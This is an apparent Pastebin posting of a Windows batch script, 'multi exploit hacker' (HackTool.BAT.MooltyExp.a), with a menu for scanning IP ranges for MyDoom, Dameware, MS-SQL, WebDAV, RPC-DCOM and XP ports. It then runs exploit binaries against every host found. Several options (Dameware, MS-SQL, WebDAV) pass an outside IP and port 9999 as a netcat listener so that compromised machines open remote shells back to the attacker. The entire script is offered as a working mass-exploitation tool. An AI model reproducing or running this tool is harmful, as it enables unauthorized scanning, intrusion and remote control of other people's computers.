Advertisement
FlyFar

HackTool.BAT.MooltyExp.a - Source Code

Jun 9th, 2023
861
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 5.99 KB | Cybersecurity | 0 0
  1. :start
  2. @echo off
  3. break on
  4. mode 80
  5. echo.
  6. cls
  7. echo *******************************************
  8. echo  *         multi exploit hacker          *
  9. echo  *             Coded by w00d             *
  10. echo *******************************************
  11. echo.
  12. set /p c=Welcome to Multi Exploit AutoHacker, Press the Enter key to continue...
  13. cls
  14.  
  15.  
  16. echo ****************************************************
  17. echo *          multi exploit hacker menu               *
  18. echo *                                                  *
  19. echo ****************************************************          
  20. echo *- Hacking                                         *
  21. echo *                                                  *
  22. echo * 1) Hacking MyDoom                                *
  23. echo * 2) Hacking ms-0349 XP Sp0 ( press "2a" for Sp1 ) *
  24. echo * 3) Hacking Dameware                              *
  25. echo * 4) Hacking MS-SQL                                *
  26. echo * 5) Hacking Webdav                                *
  27. echo * 6) Hacking RPC-DCOM XP ( press "6a" for Win2k )  *
  28. echo *                                                  *
  29. echo *==================================================*
  30. echo *- Scanning                                        *
  31. echo *                                                  *
  32. echo * smd) Scan for Mydoom ( port 3127 )               *
  33. echo *  xp) Scan for Windows XP ( port 5000 )           *
  34. echo * rpc) Scan for RPC-DCOM                           *
  35. echo * sdw) Scan for Damewre ( port 6129 )              *
  36. echo * sql) Scan for MS-SQL ( port 1433 )               *
  37. echo * dav) Scan for Webdav ( IIS 5.0 )                 *
  38. echo * del) Deletes scan.txt                            *
  39. echo *                                                  *
  40. echo * X) Exit                                          *
  41. echo *                                                  *
  42. echo ****************************************************
  43.  
  44.  
  45. echo.
  46. :choice
  47. set /p c=Make a choice:
  48.  
  49.  
  50. if "%C%"=="1" goto 1
  51. if "%C%"=="2" goto 2
  52. if "%C%"=="2a" goto 2a
  53. if "%C%"=="3" goto 3
  54. if "%C%"=="4" goto 4
  55. if "%C%"=="5" goto 5
  56. if "%C%"=="6" goto 6
  57. if "%C%"=="6a" goto 6a
  58. if "%C%"=="del" goto del
  59. if "%C%"=="smd" goto scan_mydoom
  60. if "%C%"=="sdw" goto scan_dame
  61. if "%C%"=="sql" goto scan_mssql
  62. if "%C%"=="dav" goto scan_webdav
  63. if "%C%"=="xp" goto scan_xp
  64. if "%C%"=="rpc" goto scan_rpc
  65. if "%C%"=="x" goto exit
  66.  
  67. :1
  68. cls
  69. If "scan.txt" =="" GoTo end
  70. @echo.
  71. @echo running MyDoom.a exploiter
  72. @echo assumes preconfigured shellcode and nc setup
  73. @echo.
  74. for /f "eol=; tokens=1*" %%1 in (scan.txt) do mykralor.exe %%1 3127 hs.exe
  75. @echo.
  76. @echo Done
  77. @echo off
  78. pause
  79. goto :start
  80.  
  81.  
  82. :2
  83. cls
  84. @echo running 0349 exploit - xp sp0
  85. @echo.
  86. for /f "eol=; tokens=1*" %%1 in (scan.txt) do 0349dng %%1
  87. @echo Done
  88. pause
  89. goto :start
  90.  
  91.  
  92. :2a
  93. cls
  94. @echo running 0349 exploit - xp sp1
  95. @echo.
  96. for /f "eol=; tokens=1*" %%1 in (scan.txt) do 0349dng1 %%1
  97. @echo Done
  98. pause
  99. goto :start
  100.  
  101.  
  102. :3
  103. cls
  104. @echo running Dameware exploit
  105. @echo.
  106. @echo this assumes a netcat listner on ip/port
  107. @echo.
  108. for /f "eol=; tokens=1*" %%1 in (scan.txt) do dameweird %%1 24.17.158.137 9999
  109. @echo Done
  110. pause
  111. goto :start
  112.  
  113.  
  114. :4
  115. cls
  116. @echo running MS-SQL exploit sp1
  117. @echo.
  118. for /f "eol=; tokens=1*" %%1 in (scan.txt) do sql2 %%1 24.17.158.137 9999 1
  119. @echo Done
  120. pause
  121. goto :start
  122.  
  123.  
  124. :5
  125. cls
  126. @echo running IIS 5.0 Webdav exploit
  127. @echo.
  128. for /f "eol=; tokens=1*" %%1 in (scan.txt) do webdav %%1 24.17.158.137 9999
  129. @echo Done
  130. pause
  131. goto :start
  132.  
  133. :6
  134. cls
  135. @echo running RPC-DCOM XP Universal
  136. @echo.
  137. @echo on
  138. for /f "eol=; tokens=1*" %%1 in (scan.txt) do universal 5 %%1
  139. @echo off
  140. @echo Done
  141. pause
  142. goto :start
  143.  
  144. :6a
  145. cls
  146. @echo running RPC-DCOM XP Universal
  147. @echo.
  148. for /f "eol=; tokens=1*" %%1 in (scan.txt) do universal 0 %%1
  149. @echo Done
  150. pause
  151. goto :start
  152.  
  153.  
  154.  
  155. :scan_mydoom
  156. cls
  157. echo +-------------------------------------------+
  158. echo �        Scan for ( mydoom port 3127 )      �
  159. echo +-------------------------------------------+
  160. echo.
  161. @echo off
  162. set /p startip=Start-ip :
  163. set /p endip=End-ip :
  164. @echo.
  165. scan.exe -p 3127 %startip% %endip%
  166. @echo.
  167. @echo Done
  168. pause
  169. goto :start
  170.  
  171.  
  172. :scan_dame
  173. cls
  174. echo +-------------------------------------------+
  175. echo �        Scan for ( Dameware 6129 )         �
  176. echo +-------------------------------------------+
  177. echo.
  178. @echo off
  179. set /p startip=Start-ip :
  180. set /p endip=End-ip :
  181. @echo.
  182. scan.exe -p 6129 %startip% %endip%
  183. @echo.
  184. @echo Done
  185. pause
  186. goto :start
  187.  
  188.  
  189.  
  190. :scan_mssql
  191. cls
  192. echo +-------------------------------------------+
  193. echo �        Scan for ( MS-SQL 1433 )           �
  194. echo +-------------------------------------------+
  195. echo.
  196. @echo off
  197. set /p startip=Start-ip :
  198. set /p endip=End-ip :
  199. @echo.
  200. scan.exe -p 1433 %startip% %endip%
  201. @echo.
  202. @echo Done
  203. pause
  204. goto :start
  205.  
  206.  
  207.  
  208. :scan_webdav
  209. cls
  210. echo +-------------------------------------------+
  211. echo �        Scan for ( IIS 5.0 webdav )        �
  212. echo +-------------------------------------------+
  213. echo.
  214. @echo off
  215. set /p startip=Start-ip :
  216. set /p endip=End-ip :
  217. @echo.
  218. scan.exe -webdav %startip% %endip%
  219. @echo.
  220. @echo Done
  221. pause
  222. goto :start
  223.  
  224.  
  225. :scan_xp
  226. cls
  227. echo +-------------------------------------------+
  228. echo �        Scan for ( Windows XP )            �
  229. echo +-------------------------------------------+
  230. echo.
  231. @echo off
  232. set /p startip=Start-ip :
  233. set /p endip=End-ip :
  234. @echo.
  235. scan.exe -p 5000 %startip% %endip%
  236. @echo.
  237. @echo Done
  238. pause
  239. goto :start
  240.  
  241.  
  242. :scan_rpc
  243. cls
  244. echo +-------------------------------------------+
  245. echo �        Scan for ( RPC-DCOM )            �
  246. echo +-------------------------------------------+
  247. echo.
  248. @echo off
  249. set /p startip=Start-ip :
  250. set /p endip=End-ip :
  251. @echo.
  252. scan.exe -p 135 %startip% %endip%
  253. @echo.
  254. @echo Done
  255. pause
  256. goto :start
  257.  
  258.  
  259. :del
  260. @echo off
  261. type lastscan.txt >> allscans.txt
  262. del lastscan.txt
  263. echo Are you sure?
  264. choice
  265. move scan.txt lastscan.txt
  266. goto :start
  267.  
  268. :exit
  269. @echo off
  270. exit
  271. goto :start
  272.  
  273.  
  274. :end
  275. @echo off
  276. pause
  277. goto :start
  278.  
  279. rem this was hard work
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement